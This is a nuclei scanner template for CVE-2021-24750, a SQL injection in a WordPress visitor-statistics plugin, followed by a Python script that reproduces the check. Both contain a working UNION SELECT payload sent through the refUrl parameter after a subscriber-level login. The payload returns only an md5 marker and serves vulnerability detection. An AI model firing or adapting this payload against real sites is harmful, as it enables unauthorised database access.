id: CVE-2021-24750

info:
  name: WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 SQLI
  author: cckuakilong
  severity: high
  description: The WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 does not properly sanitise and escape the refUrl parameter in the refDetails AJAX action, which is available to any authenticated user, allowing users with a role as low as subscriber to perform SQL injection attacks.
  reference:
    - https://github.com/fimtow/CVE-2021-24750/blob/master/exploit.py
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24750
    - https://wpscan.com/vulnerability/7528aded-b8c9-4833-89d6-9cd7df3620de
    - https://plugins.trac.wordpress.org/changeset/2622268
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2021-24750
    cwe-id: CWE-89
  tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,authenticated

requests:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1

      - |
        GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5('CVE-2021-24750'),4--%20%22%7D HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "266f89556d2b38ff067b580fb305c522"

      - type: status
        status:
          - 200
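The template above encodes the whole check in two raw requests and two matchers. The following Python is an added stand-alone re-implementation of that same logic, written for this page; it is not the template's own code nor the exploit.py linked in the references. It builds the `requests` JSON for the refDetails action, shows why the injected `md5('CVE-2021-24750')` column works as an oracle (the digest is computed locally rather than hard-coded, so the matcher stays self-consistent), and applies the same "status 200 AND marker in body" rule. The live runner at the bottom uses only the standard library and the cookie-reuse flow the template relies on (log in via wp-login.php, then reuse the session cookies for admin-ajax.php); the target URL and credentials are placeholders you supply, and it is only exercised when you call it.

```python
"""Added example: a stand-alone check mirroring the nuclei template for CVE-2021-24750.
Not the template's code or the referenced exploit.py. Only run against systems you own
or are authorised to test."""
import hashlib
import http.cookiejar
import json
import urllib.error
import urllib.parse
import urllib.request

# Seed string whose MD5 the injected query is asked to return; the template's
# word matcher looks for exactly that hex digest in the response body.
MARKER_SEED = "CVE-2021-24750"


def expected_marker() -> str:
    """Hex MD5 of the seed, computed locally instead of hard-coding the digest."""
    return hashlib.md5(MARKER_SEED.encode()).hexdigest()


def build_payload(seed: str = MARKER_SEED) -> str:
    """JSON object passed in the `requests` query parameter.

    refUrl is concatenated into a SELECT with no escaping (CWE-89), so a
    UNION SELECT whose third column is md5(<seed>) makes the database itself
    produce the marker. The trailing `-- ` comments out the rest of the query.
    """
    ref_url = f"' union select 1,1,md5('{seed}'),4-- "
    return json.dumps({"refUrl": ref_url}, separators=(",", ":"))


def build_check_url(root_url: str) -> str:
    """Full admin-ajax.php URL; percent-encoding is equivalent to the template's raw form."""
    query = urllib.parse.urlencode(
        {"action": "refDetails", "requests": build_payload()},
        quote_via=urllib.parse.quote,
    )
    return f"{root_url.rstrip('/')}/wp-admin/admin-ajax.php?{query}"


def is_vulnerable(status: int, body: str) -> bool:
    """Same rule as the template: matchers-condition `and` over word + status."""
    return status == 200 and expected_marker() in body


def run_live(root_url: str, username: str, password: str, timeout: int = 15) -> bool:
    """Log in, reuse the session cookies, fire the injected request, evaluate matchers.

    root_url/username/password are caller-supplied placeholders (assumption: any
    account, subscriber role is enough per the advisory).
    """
    jar = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
    base = root_url.rstrip("/")

    login_body = urllib.parse.urlencode(
        {"log": username, "pwd": password, "wp-submit": "Log In", "testcookie": "1"}
    ).encode()
    login_req = urllib.request.Request(
        f"{base}/wp-login.php",
        data=login_body,
        headers={
            "Origin": base,
            "Content-Type": "application/x-www-form-urlencoded",
            # WordPress refuses the login unless the test cookie is present.
            "Cookie": "wordpress_test_cookie=WP%20Cookie%20check",
        },
    )
    try:
        opener.open(login_req, timeout=timeout)  # 302 to wp-admin is followed; cookies land in `jar`
    except urllib.error.HTTPError:
        pass  # a non-2xx on login is not fatal; the second request decides

    try:
        with opener.open(build_check_url(base), timeout=timeout) as resp:
            return is_vulnerable(resp.status, resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as exc:
        return is_vulnerable(exc.code, exc.read().decode("utf-8", "replace"))


if __name__ == "__main__":
    # Offline demonstration on a constructed response body (no network involved).
    fake_body = "<table><tr><td>1</td><td>" + expected_marker() + "</td></tr></table>"
    print(build_check_url("https://wordpress.example"))
    print("constructed body matches:", is_vulnerable(200, fake_body))
```

Two details worth keeping from the template when porting it to other tooling: the login step needs `wordpress_test_cookie` or WordPress rejects the form outright, and the marker must be required together with a 200 status, since a database error page can echo part of the payload string without the server having evaluated `md5()`.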